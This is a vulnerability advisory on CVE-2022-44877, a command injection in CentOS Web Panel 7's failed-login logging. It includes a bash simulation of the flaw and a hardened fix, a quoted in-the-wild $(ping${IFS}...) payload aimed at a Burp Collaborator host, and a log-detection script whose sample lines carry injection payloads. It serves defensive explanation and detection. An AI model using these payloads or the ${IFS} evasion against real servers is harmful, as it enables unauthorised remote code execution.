Category: Vulnerability Intelligence
Vulnerability Class: Remote Code Execution
CVE ID: CVE-2022-44877
CVSS:3.0 Score: NA (Not Assigned)
Executive Summary
THREAT
- A new remote command execution vulnerability was found in the web management portal of CentOS Web Panel 7 (CWP, also known as Control Web Panel).
- A threat actor can exploit the vulnerability with a single crafted HTTP request; no authentication is required.
IMPACT
- The vulnerability can be leveraged to obtain a reverse shell and maintain persistence on the host.
- A remote unauthenticated threat actor can perform ransomware attacks or exfiltrate data.
MITIGATION
- Update to the latest version, as this affects CentOS Web Panel 7 < v0.9.8.1147.
- The latest version at the time of writing is v0.9.8.1148.
Investigation and Analysis
CloudSEK’s Threat Research team conducted an investigation to understand the technical details of CVE-2022-44877, and the internet-wide exploitation of CentOS Web Panel 7 installations.
Through the course of our research, we found that post-exploitation an attacker can execute commands remotely at the privilege level of the user the CentOS Web Panel runs as. In multiple cases the panel was installed and running as ‘root’, the equivalent of ‘Administrator’ on Windows, so a successful exploit yields full control of the host.
Technical Analysis - Proof of Concept Code
A security researcher released the PoC on GitHub and a PoC video on YouTube on 5th Jan 2023, after getting assurance from the CentOS Web Panel team that a sufficient number of servers had been patched.
Upon analysis of the shared exploit code, it was identified that the flaw resided in the functionality that logs incorrect login entries on the panel: the client IP address and the raw request URI are interpolated into a shell command string that appends them to the log file “wrong_entry.log”. The following simplified snippet shows the pattern responsible (illustrative of the code shape, not the panel’s verbatim source):
echo "incorrect_entry, IP address, HTTP_request_URI" >> ./wrong_entry.log
The double quotes in the above command are what make this exploitable. A double-quoted string in bash suppresses word splitting and globbing, but it does not suppress parameter expansion or command substitution: $(...) and backtick sequences inside the quotes are still evaluated by the shell. Since HTTP_request_URI is attacker-controlled, a threat actor can place $(command) in the request URI and have the command executed on the server, with the panel’s privileges, before the log line is ever written.
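To make the mechanism concrete, the following added example (not CWP’s own code) simulates the vulnerable logging pattern next to a hardened form. Everything in it is an assumption made for the demo: the temporary log directory, the function names, and the constructed attacker URI (which targets the login query parameter the public PoC uses). The vulnerable function interpolates the raw URI into a command string and hands it to /bin/sh, as a PHP shell_exec() call would; the hardened function passes the same values as positional arguments, so the shell never re-parses them.

```shell
#!/bin/bash
# Added example (not CWP's own code): simulates the logging pattern described above.
# Assumptions: the log path (a temp dir), the function names, and the constructed attacker
# URI are all made up for the demo; the panel's real file and variable names are not used.
LOG_DIR=$(mktemp -d)
MARKER="$LOG_DIR/pwned"
trap 'rm -rf "$LOG_DIR"' EXIT

# Vulnerable shape: the raw URI is interpolated into a command STRING, which is then handed
# to /bin/sh (this is what a PHP shell_exec("echo \"...$uri...\" >> log") call does).
# Inside the inner shell's double quotes, $(...) and `...` are still command substitutions.
log_wrong_entry_vulnerable() {
    local ip="$1" uri="$2" log="$LOG_DIR/wrong_entry_vuln.log"
    sh -c "echo \"incorrect_entry, $ip, $uri\" >> \"$log\""
}

# Hardened shape: the values are passed to the shell as positional ARGUMENTS and referenced
# as "$1"/"$2"; expansion results are never re-parsed as shell syntax, so the URI is just data.
# (The PHP equivalent is escapeshellarg() on each interpolated value, or avoiding the shell
# entirely with file_put_contents(..., FILE_APPEND).)
log_wrong_entry_hardened() {
    local ip="$1" uri="$2" log="$LOG_DIR/wrong_entry_safe.log"
    sh -c 'printf "%s\n" "incorrect_entry, $1, $2" >> "$3"' sh "$ip" "$uri" "$log"
}

# Returns 0 if the smuggled command ran (marker file exists), 1 otherwise; resets the marker.
injection_fired() {
    if [ -e "$MARKER" ]; then
        rm -f "$MARKER"
        return 0
    fi
    return 1
}

# Constructed attacker URI: $(...) smuggled into the login parameter the public PoC targets.
PAYLOAD_URI='/login/index.php?login=$(touch '"$MARKER"')'

# Stand-alone demo.
log_wrong_entry_vulnerable 203.0.113.5 "$PAYLOAD_URI"
if injection_fired; then echo "vulnerable: smuggled command executed"; fi
log_wrong_entry_hardened 203.0.113.5 "$PAYLOAD_URI"
if injection_fired; then
    echo "hardened: smuggled command executed (unexpected)"
else
    echo "hardened: URI written to the log verbatim, nothing executed"
fi
```

The point of the hardened variant is not the quoting style but the data path: once the URI travels as an argument rather than as part of the command text, the inner shell expands "$2" to the attacker’s string and stops, because the result of an expansion is never re-scanned for $(...) or backticks.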
When the PoC is run against a vulnerable instance with a reverse-shell command in the request URI, we get a connection back to the listener shell.
[Figure: Illustration of 2 shells]
There are multiple vulnerable servers in the wild, and threat actors have started exploiting them using the exploit payload shown below.
[Figure: The sample payload]
Understanding the Payload
- ping${IFS}-nc${IFS}2${IFS}222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com can be simplified to ping -nc 2 222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com
- ${IFS} is the bash Internal Field Separator variable, which by default holds space, tab and newline. When it is expanded unquoted, the shell word-splits on those characters, so ping${IFS}-nc${IFS}2${IFS}host is parsed as four separate words exactly as if spaces had been typed. It is used here because a literal space is a bad character in this context (the raw request URI cannot carry an unencoded space), so ${IFS} stands in for it.
- The goal of the payload is therefore an out-of-band ping-back: the vulnerable server resolves and pings the attacker’s Burp Collaborator (oastify.com) hostname, which confirms blind command execution without needing any output in the HTTP response.
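Defenders see exactly this payload shape in the web server’s access logs, so the following added example (not part of the advisory) decodes the ${IFS} trick and flags exploitation attempts against the login page. The three access-log lines are constructed for the demo; the Collaborator hostname is the one shown in the payload above, and the detection rule (command substitution characters or ${IFS} in the request URI) is a deliberately simple one that a practitioner would extend.

```shell
#!/bin/bash
# Added example (not from the original advisory): decodes the ${IFS} trick and flags
# exploitation attempts in web-server access logs. The log lines below are constructed
# for the demo; the Collaborator hostname is the one shown in the advisory's payload.

# Rewrite ${IFS}/$IFS to a single space so the payload reads as the attacker intended.
simplify_payload() {
    printf '%s' "$1" | sed -e 's/\${IFS}/ /g' -e 's/\$IFS/ /g'
}

# A request URI is treated as an injection attempt if it carries shell command
# substitution ($( or backtick) or the ${IFS} space-substitute. Returns 0 when flagged.
is_injection_attempt() {
    case "$1" in
        *'$('*|*'`'*|*'${IFS}'*) return 0 ;;
    esac
    return 1
}

# Reads access-log lines (Apache/nginx combined format) on stdin, prints one alert per
# flagged line to stderr, and prints the number of flagged lines to stdout.
count_suspicious() {
    local n=0 line req
    while IFS= read -r line; do
        # The request line is the first double-quoted field: "METHOD URI PROTOCOL".
        req=$(printf '%s\n' "$line" | awk -F'"' '{print $2}' | awk '{print $2}')
        if is_injection_attempt "$req"; then
            n=$((n + 1))
            printf 'ALERT %s -> %s\n' "${line%% *}" "$(simplify_payload "$req")" >&2
        fi
    done
    printf '%s\n' "$n"
}

# Constructed sample log: one ${IFS} ping-back payload, one benign login, one backtick payload.
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [05/Jan/2023:10:12:01 +0000] "POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com) HTTP/1.1" 200 512 "-" "curl/7.86.0"
198.51.100.7 - - [05/Jan/2023:10:13:45 +0000] "POST /login/index.php?login=admin HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jan/2023:10:15:22 +0000] "POST /login/index.php?login=`id` HTTP/1.1" 200 512 "-" "python-requests/2.28.1"
EOF
)

# Stand-alone demo: prints two ALERT lines to stderr and the count "2" to stdout.
printf '%s\n' "$SAMPLE_LOG" | count_suspicious
```

Because the panel logs the raw, undecoded request URI, the metacharacters that matter ($, parentheses, backticks) must appear literally in the request for the attack to work, which is also why matching on them in the raw access log is reliable here; a rule that first URL-decodes the URI would only add false positives for this bug.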
[Figure: DNS interaction received from the vulnerable server]
Information from OSINT - Exploitability & Presence
CentOS Web Panel 7 is a widely used server management tool. A Shodan query for it returns ~436,000 servers exposing the panel, each of which could potentially be vulnerable to the remote code execution vulnerability (the count reflects exposed panels, not confirmed unpatched versions).
[Figure: Shodan search query showing vulnerable servers]
The same pattern can also be observed from other search engines like Censys.
[Figure: Censys search query showing vulnerable servers]
Mitigation
A high-impact vulnerability that is also easily exploitable is a prime target for threat actors, and now that the PoC is public, the threat actors’ job is that much easier. Hence we recommend that users update to the latest version, v0.9.8.1148, and, where the panel must remain reachable from the internet, restrict access to its management ports to trusted addresses in the meantime.